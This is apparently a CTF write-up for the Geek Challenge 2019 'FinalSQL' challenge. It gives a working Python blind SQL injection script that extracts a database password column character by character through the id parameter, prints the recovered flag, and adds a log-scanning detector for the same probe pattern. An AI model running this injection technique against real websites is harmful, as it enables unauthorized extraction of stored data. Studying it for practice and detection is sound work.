[Geek Challenge 2019]FinalSQL
阿新 • Published: 2021-07-18
Posting a blind-injection script.
Look closely at the challenge's hint and try blind injection.
import requests
import time

url = 'http://994f19ff-38c7-446e-b200-01d5ce55d8bc.node3.buuoj.cn/search.php'
flag = ''

for i in range(1, 250):
    # Binary search over the printable ASCII range for the character at position i
    low = 32
    high = 128
    mid = (low + high) // 2
    while low < high:
        #payload = 'http://8c7ac1a3-8ac9-4802-ba55-d0463e4683e6.node3.buuoj.cn/search.php?id=1^(ascii(substr(database(),%d,1))=%d)#' %(i,mid)
        payload = url + "?id=1^(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)" % (i, mid)
        res = requests.get(url=payload)
        # 'ERROR' in the response means the comparison was true: the character is above mid
        if 'ERROR' in res.text:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2
    # Landing on either boundary means there is no character left to read
    if mid == 32 or mid == 127:
        break
    flag = flag + chr(mid)
    print(flag)
    time.sleep(1)
Remember to go slowly.
It's hidden really deep:
cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{ddc7e779-690e-4e20-bb90-5cc863fdc71b}
For the LichKing !
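
A detection-side view of the script above, as an added example that is not part of the original post: every request it sends carries the same `ascii(substr(...,pos,1))>threshold` comparison in the `id` parameter, so an access log can be scanned for that shape. The log line format, the IP addresses and the names `find_blind_sqli` and `_probe` are assumptions made for this example.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Shape of the probe sent by the script: ascii(substr(<subquery>,<pos>,1)) > <threshold>
PROBE = re.compile(
    r"ascii\(\s*substr\(.+,\s*(\d+)\s*,\s*1\s*\)\s*\)\s*[<>=]\s*(\d+)", re.I | re.S)
LOG_LINE = re.compile(r'^(\S+) "GET (\S+) HTTP/[\d.]+"')  # assumed log format

def find_blind_sqli(lines, min_probes=4):
    """Return {client: {"distinct_probes": n, "positions": [...]}} for clients
    whose id parameter repeatedly carries the ascii(substr(...)) comparison."""
    seen = defaultdict(lambda: defaultdict(set))  # client -> position -> thresholds
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        client, target = m.groups()
        # parse_qs percent-decodes the value, so %5E and %3E become ^ and >
        for value in parse_qs(urlsplit(target).query).get("id", []):
            if value.isdigit():  # a legitimate id is a plain integer
                continue
            probe = PROBE.search(value)
            if probe:
                seen[client][int(probe.group(1))].add(int(probe.group(2)))
    report = {}
    for client, by_pos in seen.items():
        probes = sum(len(thresholds) for thresholds in by_pos.values())
        if probes >= min_probes:  # many thresholds per position = binary search
            report[client] = {"distinct_probes": probes, "positions": sorted(by_pos)}
    return report

def _probe(ip, pos, thr):
    # Builds one constructed log line, URL-encoded the way an HTTP client sends it
    q = f"1%5E(ascii(substr((select(group_concat(password))from(F1naI1y)),{pos},1))%3E{thr})"
    return f'{ip} "GET /search.php?id={q} HTTP/1.1" 200'

# Constructed sample log: one ordinary client and one client sending probes
SAMPLE_LOG = (
    ['192.0.2.10 "GET /search.php?id=1 HTTP/1.1" 200',
     '192.0.2.10 "GET /search.php?id=5 HTTP/1.1" 200']
    + [_probe("192.0.2.77", pos, thr) for pos in (1, 2) for thr in (80, 104, 92, 98)]
)

if __name__ == "__main__":
    print(find_blind_sqli(SAMPLE_LOG))
```

Counting distinct thresholds per character position, rather than raw hits, keeps a single malformed request from raising an alert while still surfacing slow, rate-limited extraction like the one-second delay used above.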